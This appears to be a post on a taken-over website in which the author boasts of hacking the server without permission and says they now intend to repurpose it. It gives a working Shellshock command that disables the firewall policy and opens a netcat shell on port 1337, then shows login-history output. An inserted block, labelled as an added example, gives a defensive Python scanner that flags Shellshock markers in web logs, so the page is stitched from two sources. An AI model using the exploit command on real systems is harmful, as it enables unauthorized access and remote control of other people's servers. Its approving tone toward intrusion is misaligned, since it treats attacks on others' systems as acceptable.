A Vulnerable Website

Ignore Security and it goes away

Who Needs Security?

Welcome to vulnerable.site! The admins of this site must be very lazy. Apparently they don't like dealing with silly things like security, or updating software, and they certainly don't care about their privacy either. As the folks at packetstorm will tell you:

"Ignore security, and it will go away."

So that's exactly what the administrators of this website did, and that's exactly why I hacked them. Can you really blame me? With a domain like this, these guys were practically begging for it.

Really, they ought to be thanking me, because their site is running a hell of a lot better than it was previously. I've taken the liberty of getting this site an SSL certificate, and forcing HTTPS. I've also updated their server, which had not been updated since long before shellshock. Getting root was as simple as...

echo -e "GET /cgi-bin/status HTTP/1.0 \n user-agent: () { :; }; /bin/bash -c 'echo VULERNABLE && (iptables -P INPUT ACCEPT;nc -lvp 1337 -e /bin/sh 2>/dev/null &)&'" | nc thisbox 80
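A request like the one above leaves a recognizable trace in web server access logs. The following scanner is an added example, not part of the original post: it assumes the server writes Apache/nginx "combined" format, and `find_shellshock`, `SAMPLE_LOG` and the log lines themselves are constructed for illustration.

```python
import re

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Bash treats an environment value beginning with "() {" as a function definition.
# CGI copies request headers into the environment, so this marker in a header is the tell.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines (documentation IP ranges, harmless payload text).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Nov/2016:12:01:10 +0000] "GET /cgi-bin/status HTTP/1.0" '
    '200 42 "-" "() { :; }; echo probe"',
    '192.0.2.10 - - [19/Nov/2016:12:02:00 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [19/Nov/2016:12:03:30 +0000] "GET /cgi-bin/status HTTP/1.0" '
    '500 0 "() { ignored; }; echo probe" "curl/7.50"',
]


def find_shellshock(lines):
    """Return one record per log line whose request, referer or user-agent carries the marker."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if m is None:
            continue  # not combined format; skip rather than guess
        fields = [name for name in ("request", "referer", "agent")
                  if FUNC_DEF.search(m[name])]
        if fields:
            parts = m["request"].split()
            hits.append({
                "line": number,
                "ip": m["ip"],
                "path": parts[1] if len(parts) > 1 else "",
                "status": int(m["status"]),
                "fields": fields,
            })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

Combined format records only the referer and user-agent headers, so a clean result does not rule out the same marker arriving in a header the server never logged.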

It also appears that nobody has logged in to this box since 2011...

[email protected]:/etc/nginx/sites-enabled# last -F
lol pts/4       Sat Nov 19 12:12:29 2016   still logged in                      
admin    pts/0        x.x.x.x     Fri Feb 26 16:12:18 2011   Fri Feb 26 17:15:01 2011  

wtmp begins Fri Nov  4 13:48:49 2007

I assume that it's okay if I repurpose it? Yes? No? Maybe so? (I'll take that as a yes! xD) Be sure to check back often, because I am nowhere near through with this project. More awesome content coming soon.